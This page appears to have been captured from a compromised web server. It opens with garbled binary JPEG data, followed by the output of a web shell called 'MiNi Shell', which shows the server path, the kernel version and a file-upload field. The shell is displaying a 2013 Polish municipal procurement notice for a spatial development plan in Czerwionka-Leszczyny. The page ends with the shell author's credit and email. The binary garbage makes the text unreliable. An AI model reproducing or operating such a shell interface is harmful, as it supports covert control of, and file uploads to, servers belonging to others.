JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130218/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130218/67522-N-2013.html

<p class="kh_header"><b>Czerwionka-Leszczyny: Sporządzenie miejscowego planu zagospodarowania przestrzennego Gminy i Miasta Czerwionka - Leszczyny dla  obszaru położonego w rejonie ulic Wyzwolenia, Leszczyńskiej oraz granicy sołectwa Stanowice</b><br>
<b>Numer ogłoszenia: 67522 - 2013; data zamieszczenia: 18.02.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina i Miasto Czerwionka-Leszczyny , ul. Parkowa 9, 44-230 Czerwionka-Leszczyny, woj. śląskie, tel. 032 4295911, 4318105, faks 032 4311760, 4318105.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.czerwionka-leszczyny.pl</li><li><b>Adres strony internetowej, pod którym dostępne są informacje dotyczące dynamicznego systemu zakupów:</b> nie dotyczy</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Sporządzenie miejscowego planu zagospodarowania przestrzennego Gminy i Miasta Czerwionka - Leszczyny dla  obszaru położonego w rejonie ulic Wyzwolenia, Leszczyńskiej oraz granicy sołectwa Stanowice.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia jest sporządzenie miejscowego planu zagospodarowania               	przestrzennego Gminy i Miasta Czerwionka - Leszczyny dla  obszaru położonego                              	w rejonie ulic Wyzwolenia, Leszczyńskiej oraz granicy sołectwa Stanowice                        	o powierzchni około 52 ha, zgodnie z Uchwałą Nr XXVI/339/12 Rady Miejskiej                    	w Czerwionce-Leszczynach z dnia 12 grudnia 2012 r. w sprawie przystąpienia do                	sporządzenia miejscowego planu zagospodarowania przestrzennego Gminy i Miasta              	Czerwionka-Leszczyny dla obszaru położonego w rejonie ulic Wyzwolenia,                      	Leszczyńskiej oraz granicy sołectwa Stanowice stanowiącej Załącznik Nr 9 do SIWZ. 
	Teren objęty jest jedną z form ochrony - Park Krajobrazowy Cysterskie Kompozycje             	Krajobrazowe Rud Wielkich. W obszarze tym nie występują grunty wymagające                   	złożenia wniosku o zgodę na wyłączenie z produkcji rolnej. 

2.	Zakres przedmiotu zamówienia obejmuje:
	1)	sporządzenie tekstu i rysunku projektu miejscowego planu zagospodarowania                		przestrzennego, o którym mowa w pkt 1, zgodnie z obowiązującą ustawą                                   		z dnia 27 marca 2003 r. o planowaniu i zagospodarowaniu przestrzennym                         		(tj. Dz.U. z 2012 poz. 647 z późn. zm.) w zakresie określonym w rozporządzeniu                      		Ministra Infrastruktury z dnia 26 sierpnia 2003 r. w sprawie wymaganego zakresu                 		projektu miejscowego planu zagospodarowania przestrzennego (Dz.U. Nr 164,                  		poz. 1587), oraz zgodnie z przepisami innych ustaw związanych z problematyką                  		planowania przestrzennego, 
	2)	opracowanie prognozy oddziaływania na środowisko spełniającej wymagania                    		określone w ustawie z dnia 3 października 2008 r. o udostępnianiu informacji               		o środowisku i jego ochronie, udziale społeczeństwa w ochronie środowiska oraz                     		o ocenach oddziaływania na środowisko (Dz.U. Nr 199, poz. 1227 z późn. zm.)                   		wraz z pisemną informacją, w jaki sposób i w jakim zakresie zostały uwzględnione                        		w projekcie planu ustalenia zawarte w prognozie oddziaływania na środowisko,
	3) 	sporządzenie prognozy skutków finansowych uchwalenia planu, uwzględniającej             		wymagania rozporządzenia Ministra Infrastruktury z dnia 26 sierpnia 2003 r.                         		w sprawie wymaganego zakresu projektu miejscowego planu zagospodarowania 		przestrzennego (Dz.U. Nr 164, poz. 1587),
	4)	przygotowanie wymaganych przepisami zawiadomień, pism, ogłoszeń,                          		obwieszczeń, wykazów, zestawień, wystąpień, uchwał niezbędnych do wykonania 		czynności określonych w art. 17 ustawy o planowaniu i zagospodarowaniu                      		przestrzennym, a także przygotowanie korespondencji w tym zakresie do wysyłki,
	5)		wykonanie inwentaryzacji urbanistycznej wraz z niezbędną dokumentacją                      			fotograficzną w wersji papierowej i elektronicznej - prace terenowe (wizja                            			terenowa zainwestowania i uzbrojenia terenu oraz elementów przyrodniczych),
	6) 	opracowanie koncepcji projektu zmiany planu w skali 1:1000, uwzględniającej 			wyniki z dokonanej analizy, a także ustalenie planu zagospodarowania                          		przestrzennego województwa i przedstawienie jej Burmistrzowi Gminy i Miasta                		Czerwionka -Leszczyny,
		7) skoordynowanie ustaleń projektu planu w rejonie granic jego opracowania                    			z zapisami obowiązujących planów sąsiednich,
	8) 	udział w dyskusji publicznej nad przyjętymi w projekcie planu rozwiązaniami oraz            		w posiedzeniu gminnej komisji urbanistyczno-architektonicznej, 
	9)	udział w posiedzeniu komisji branżowej przed sesją oraz na sesji, na której                     		planowane będzie uchwalenie projektu planu,
	10)	opracowanie rysunku projektu miejscowego planu zagospodarowania                            		przestrzennego w wersji elektronicznej w formacie .DAT, .MAP .TAB, .ID lub .WOR                		lub .SHP lub równoważnych, na nośnikach cyfrowych oraz doprowadzenie do jego		poprawnego działania na sprzęcie i oprogramowaniu będącym w posiadaniu                    		Zamawiającego. Prace projektowe powinny być zarejestrowane w układzie                    		geodezyjnym 2000 w odwzorowaniu dla Polski,
	11)	opracowanie rysunku projektu miejscowego planu zagospodarowania                              		przestrzennego w wersji papierowej  w skali 1:1000,
	12)	wprowadzenie projektu planu do Edytora Aktów Prawnych umożliwiającego                  		publikację w Dzienniku Urzędowym,
	13)	kompletowanie dokumentacji formalno-prawnej w ciągu całego okresu                             		sporządzania projektu planu.

3.Przedmiot zamówienia wykonany zostanie etapami, stanowiącymi przedmiot                         	odrębnych odbiorów, zgodnie z terminami ich realizacji określonymi w Harmonogramie 	rzeczowo-finansowym stanowiącym Załącznik Nr 8 do SIWZ.

4.Wykonawca odpowiedzialny będzie za pozytywne uzgodnienie projektów przez                        	właściwe organy, w zakresie wynikającym z rzetelności realizacji przedmiotu                          	zamówienia. Wymaga się również aby Wykonawca wprowadzał wymagane zmiany do 	projektów, brał udział w dyskusjach publicznych oraz analizował uwagi. 
	
5.Wykonawca ponosi odpowiedzialność za prawidłowość procedury i wymaganych                  	uzgodnień a także za kompletność uwzględnienia w projekcie planu wymogów,                     	wymagań, walorów i potrzeb określonych w art.1 ust. 2 ustawy o planowaniu                      	i zagospodarowaniu przestrzennym.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 71.41.00.00-5.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 11.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Warunkiem wzięcia udziału w postępowaniu jest wniesienie wadium w wysokości           1 200,00 zł (słownie: tysiąc dwieście złotych) w terminie do dnia 06.03.2013 r. do godz.10:30</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>-</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek posiadania niezbędnej wiedzy i doświadczenia zostanie spełniony, jeżeli Wykonawca wykaże się wykonaniem w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie:
a) co najmniej dwóch miejscowych planów zagospodarowania przestrzennego lub co najmniej dwóch zmian miejscowych planów zagospodarowania przestrzennego,
albo 
b) co najmniej jednego miejscowego planu zagospodarowania przestrzennego                   oraz jednej zmiany miejscowego planu zagospodarowania przestrzennego

- wykonanych w oparciu o przepisy ustawy z dnia 27 marca 2003 r. o planowaniu                   i zagospodarowaniu przestrzennym oraz które zostały uchwalone i opublikowane           w Wojewódzkim Dzienniku Urzędowym</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>-</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek dysponowania osobami zdolnymi do wykonania zamówienia zostanie spełniony, jeżeli Wykonawca będzie dysponował co najmniej jedną osobą, która jest członkiem właściwej izby samorządu zawodowego urbanistów oraz samodzielnie projektowała przestrzeń lub kierowała zespołem prowadzącym projektowanie przestrzeni w ramach opracowywania:
a) miejscowego planu zagospodarowania przestrzennego,  
lub 
b) zmiany miejscowego planu zagospodarowania przestrzennego</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>-</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1. Zgodnie z art. 144 ust.1 ustawy Prawo zamówień publicznych, Zamawiający przewiduje możliwość dokonania istotnych zmian postanowień umowy w przypadkach   określonych w pkt. 2.

2. Zamawiający przewiduje możliwość przedłużenia terminu zakończenia realizacji              	zamówienia oraz terminów realizacji poszczególnych etapów, określonych                            	w Harmonogramie rzeczowo-finansowym z przyczyn niezależnych od Wykonawcy                       	w przypadku:
	1)	wystąpienia okoliczności wynikających ze specyfiki procedury sporządzania                     		miejscowego planu zagospodarowania przestrzennego, w tym konieczności                     		powtórzenia czynności planistycznych w sytuacji gdy:
	a)	potrzeba ponowienia uzgodnień w niezbędnym zakresie wyniknie                         		z wprowadzania zmian do projektu - o czas niezbędny do ich ponowienia,
	b)	w przypadku ponowienia procedury wynikającej z konieczności                               		dokonania zmian w przedstawionym do uchwalenia projekcie planu                              		miejscowego, w tym także w wyniku uwzględnienia wniesionych do projektu                   		planu uwag, jeśli tak zadecyduje Rada Miejska - o czas niezbędny do jej                      		ponowienia,
	2) wystąpienia postępowania odwoławczego na skutek złożenia zażalenia/-eń na                  		postanowienie/-nia w sprawie uzgodnienia planu miejscowego - o czas trwania                 		postępowania odwoławczego,
	3) 	w przypadku zmian w czasie trwania umowy obowiązujących przepisów prawnych,           		mających wpływ na realizację umowy, w tym na sposób opracowania przez                     		Wykonawcę projektu planu miejscowego i powodujących konieczność wykonania             		dodatkowych materiałów, opracowań i czynności niezbędnych do uchwalenia                   		miejscowego planu zagospodarowania przestrzennego - o czas niezbędny do ich              		wykonania.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.czerwionka-leszczyny.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy i Miasta Czerwionka - Leszczyny, Wydział Zamówień Publicznych, ul. Dr. Rostka 7, 44 - 230 Czerwionka - Leszczyny.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 06.03.2013 godzina 10:30, miejsce: oferty należy składać w siedzibie Zamawiającego przy ul. Parkowej 9, 44-230 Czerwionka-Leszczyny (kancelaria - pokój Nr - 5 parter).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> 1. Zamawiający nie przewiduje zawarcia umowy ramowej. 
2. Zamawiający nie zamierza ustanowić dynamicznego systemu zakupów.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com